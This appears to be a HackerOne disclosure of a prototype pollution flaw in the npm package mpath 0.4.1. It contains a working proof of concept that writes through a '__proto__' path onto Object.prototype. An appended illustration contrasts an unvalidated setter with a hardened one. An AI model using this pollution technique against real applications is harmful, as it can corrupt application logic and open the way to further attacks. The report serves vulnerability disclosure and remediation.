hackerone / Cris_semmle / H1:390860
History: Aug 06, 2018 - 10:40 a.m.

Node.js third-party modules: Prototype Pollution Vulnerability in mpath Package


EPSS: 0.001 Low, Percentile: 42.0%

I would like to report a prototype pollution vulnerability in mpath.
It allows an attacker to inject arbitrary properties on Object.prototype.

Module

module name: mpath
version: 0.4.1
npm page: https://www.npmjs.com/package/mpath

Module Description

{G,S}et javascript object values using MongoDB-like path notation

Module Stats

305,874 downloads in the last week

Vulnerability

Vulnerability Description

An attacker can specify a path that includes the prototype object, and thus overwrite important properties on Object.prototype or add new ones.

Steps To Reproduce:

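var mpath = require("mpath");
var obj = {
    comments: [
        { title: 'funny' },
        { title: 'exciting!' }
    ]
};
// The path starts at __proto__, so the write lands on Object.prototype, not on obj.
mpath.set('__proto__.x', ['hilarious', 'fruity'], obj);
// A fresh, unrelated object now inherits x.
console.log({}.x);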

Patch

N/A. Validate property names before overwriting them and prevent writes to certain paths.

Wrap up

  • I contacted the maintainer to let them know: [N
  • I opened an issue in the related repository: N

Impact

This may be an intended behaviour of this module, but it needs to be better documented. Moreover, to properly analyse the impact of this vulnerability, one must look at the clients of this module, such as mongoose, and see if attackers can realistically control the path value.
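
Added example (not part of the original report and not mpath's code): one way to apply the validation suggested under Patch, shown beside an unvalidated setter for contrast. The names naiveSet, safeSet, FORBIDDEN_SEGMENTS and demo are hypothetical, and naiveSet is a simplified stand-in for a dotted-path setter, not mpath's implementation.

```javascript
// Added illustration, not mpath's code; all names here are hypothetical.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Simplified stand-in for a dotted-path setter with no validation.
function naiveSet(path, value, target) {
  const parts = path.split('.');
  let cur = target;
  for (const key of parts.slice(0, -1)) {
    if (cur[key] == null) cur[key] = {};
    cur = cur[key]; // '__proto__' resolves to Object.prototype here
  }
  cur[parts[parts.length - 1]] = value;
}

// Hardened setter: validates every segment before writing anything and
// only descends through the target's own properties.
function safeSet(path, value, target) {
  const parts = String(path).split('.');
  for (const key of parts) {
    if (FORBIDDEN_SEGMENTS.has(key)) {
      throw new Error('refusing path segment: ' + key);
    }
  }
  let cur = target;
  for (const key of parts.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(cur, key)) cur[key] = {};
    if (cur[key] === null || typeof cur[key] !== 'object') {
      throw new TypeError('cannot descend into non-object at: ' + key);
    }
    cur = cur[key];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// Runs both setters on constructed input and reports what happened.
function demo() {
  const out = {};
  naiveSet('__proto__.polluted', 'yes', {});
  out.naivePolluted = ({}).polluted === 'yes';
  delete Object.prototype.polluted; // undo the pollution before continuing
  out.rejected = ['__proto__.polluted', 'constructor.prototype.polluted'].map((p) => {
    try { safeSet(p, 'yes', {}); return false; } catch (e) { return true; }
  });
  out.safePolluted = 'polluted' in {};
  const obj = { comments: [{ title: 'funny' }, { title: 'exciting!' }] };
  out.legit = safeSet('comments.1.title', 'hilarious', obj).comments[1].title;
  return out;
}
console.log(demo());
```

Rejecting the whole path before any write matters: checking segments while walking would leave intermediate objects created by a path that is later refused.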
